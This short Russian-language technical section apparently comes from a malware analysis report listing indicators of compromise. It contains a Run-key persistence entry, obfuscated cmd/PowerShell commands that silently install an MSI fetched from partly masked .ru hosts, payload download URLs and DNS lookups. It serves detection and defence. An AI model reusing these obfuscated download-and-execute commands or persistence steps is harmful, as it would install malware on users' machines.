Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'rendegravningers' = '%TEMP%\papmlken\ISTANDSTTELSERNES.exe'
- '<SYSTEM32>\cmd.exe' /c powershell m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://ff#h.ru/jj.msi
- ieinstal.exe
- %TEMP%\papmlken\istandsttelsernes.exe
- http://ff#h.ru/jj.msi
- http://br###themlrd.ru/Host9_kEvSa4.bin
- http://df#d.ru/Host9_kEvSa4.bin
- DNS ASK ff#h.ru
- DNS ASK br###themlrd.ru
- DNS ASK df#d.ru
- '%WINDIR%\installer\msia230.tmp'
- '<SYSTEM32>\cmd.exe' /c powershell m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://ff#h.ru/jj.msi' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' msiexec.exe /q /i http://ff#h.ru/jj.msi
- '<SYSTEM32>\msiexec.exe' /q /i http://ff#h.ru/jj.msi
- '%ProgramFiles(x86)%\internet explorer\ieinstal.exe'